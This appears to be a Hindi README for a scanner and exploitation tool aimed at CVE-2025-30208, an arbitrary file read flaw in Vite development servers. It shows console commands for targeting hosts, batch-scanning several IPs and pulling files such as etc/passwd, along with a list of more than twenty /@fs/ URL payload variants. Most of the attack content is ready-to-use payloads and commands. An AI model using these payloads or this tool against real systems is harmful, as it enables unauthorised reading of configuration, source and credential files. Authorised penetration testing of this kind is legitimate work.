
CVE‑2025‑30208 Vite विकास सर्वर (एक लोकप्रिय फ्रंटएंड बिल्ड टूल) में एक मध्यम-गंभीरता वाली मनमानी फ़ाइल पढ़ने की कमजोरी है।
CVE-2025-30208 के लिए उन्नत भेद्यता स्कैनर जिसमें एंटरप्राइज़-ग्रेड सुविधाएँ हैं
Vite मनमानी फ़ाइल पढ़ने की भेद्यता का पता लगाने के लिए पेशेवर पैठ परीक्षण उपकरण
🚀 त्वरित आरंभ • 📋 विशेषताएँ • 🔧 उपयोग • 📊 उदाहरण • 🛡️ सुरक्षा
यह एक व्यापक भेद्यता स्कैनर है जो Vite विकास सर्वरों में CVE-2025-30208 भेद्यता का पता लगाने और उसका शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता Vite के फ़ाइल सिस्टम एंडपॉइंट के माध्यम से मनमानी फ़ाइल पढ़ने की पहुँच प्रदान करती है, जिससे संभावित रूप से संवेदनशील कॉन्फ़िगरेशन फ़ाइलें, स्रोत कोड और सिस्टम जानकारी उजागर हो सकती है।
उपकरण में अब बेहतर रखरखाव और विस्तारशीलता के लिए मॉड्यूलर आर्किटेक्चर है:
CVE-2025-30208.py - मुख्य स्कैनर एप्लिकेशनpayloads.py - उन्नत शोषण पेलोड (60+ विविधताएँ)sensitive_files.py - व्यापक संवेदनशील फ़ाइल डेटाबेस (200+ फ़ाइलें)html_template.py - उन्नत हैकर-शैली HTML रिपोर्टिंग टेम्पलेटpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# विस्तृत आउटपुट के लिए वर्बोज़ मोड सक्षम करें
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[समाप्त करने के लिए Enter दो बार दबाएँ]
CVE-2025-30208 > scan
# प्रॉक्सी कॉन्फ़िगर करें
CVE-2025-30208 > proxy
प्रॉक्सी दर्ज करें: http://127.0.0.1:8080
# कस्टम हेडर सेट करें
CVE-2025-30208 > headers
हेडर दर्ज करें: {"User-Agent": "Custom Scanner"}
# दर सीमित करना कॉन्फ़िगर करें
CVE-2025-30208 > rate
दर सीमा दर्ज करें: 1.0
# सुंदर HTML रिपोर्ट जनरेट करें
CVE-2025-30208 > pull
# रिपोर्ट देखने के लिए वेब सर्वर शुरू करें
CVE-2025-30208 > web
# विशिष्ट पोर्ट पर वेब सर्वर शुरू करें
CVE-2025-30208 > web 8081
# वेब सर्वर बंद करें
CVE-2025-30208 > web off
| कमांड | विवरण | उदाहरण |
|---|---|---|
set <option> <value> | कॉन्फ़िगरेशन विकल्प सेट करें | set RHOST 192.168.1.100 |
show options | वर्तमान सेटिंग्स प्रदर्शित करें | show options |
edit | इंटरैक्टिव विकल्प संपादक | edit |
run / exploit | भेद्यता परीक्षण चलाएँ | run |
batch | एकाधिक लक्ष्यों की बैच स्कैनिंग | batch |
scan | संवेदनशील फ़ाइलों की खोज | scan |
pull | परिणाम HTML/JSON में निर्यात करें | pull |
web [on|off|port] | HTML रिपोर्ट के लिए वेब सर्वर | web 8080 |
save | सत्र कॉन्फ़िगरेशन सहेजें | save |
load | सत्र कॉन्फ़िगरेशन लोड करें | load |
test | लक्ष्य से कनेक्टिविटी का परीक्षण करें | test |
validate | वर्तमान कॉन्फ़िगरेशन मान्य करें | validate |
verbose | वर्बोज़ मोड टॉगल करें | verbose |
proxy | प्रॉक्सी सेटिंग्स कॉन्फ़िगर करें | proxy |
headers | कस्टम HTTP हेडर सेट करें | headers |
rate | दर सीमित करना कॉन्फ़िगर करें | rate |
log | लॉगिंग जानकारी दिखाएँ | log |
help / ? | सहायता दिखाएँ | help |
exit / quit | उपकरण से बाहर निकलें | exit |
| विकल्प | विवरण | डिफ़ॉल्ट | सत्यापन |
|---|---|---|---|
RHOST | लक्ष्य होस्ट/IP पता | - | होस्टनाम/IP सत्यापन |
RPORT | लक्ष्य पोर्ट संख्या | - | पोर्ट रेंज (1-65535) |
FILEPATH | परीक्षण करने के लिए फ़ाइल पथ | etc/passwd | पथ सत्यापन |
PROXY | HTTP/HTTPS प्रॉक्सी URL | - | URL प्रारूप सत्यापन |
VERBOSE | वर्बोज़ आउटपुट सक्षम करें | false | बूलियन सत्यापन |
RATE_LIMIT | अनुरोधों के बीच विलंब (सेकंड) | 0.3 | संख्यात्मक सत्यापन |
THREADS | बैच स्कैनिंग के लिए थ्रेड्स की संख्या | 5 | पूर्णांक सत्यापन |
TIMEOUT | अनुरोध टाइमआउट (सेकंड) | 5 | पूर्णांक सत्यापन |
CUSTOM_HEADERS | कस्टम HTTP हेडर (JSON) | {} | JSON प्रारूप सत्यापन |
स्कैनर अब payloads.py में संगठित 60+ विभिन्न पेलोड विविधताओं का उपयोग करता है:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
उपकरण अब sensitive_files.py में संगठित 200+ संवेदनशील फ़ाइलों का परीक्षण करता है: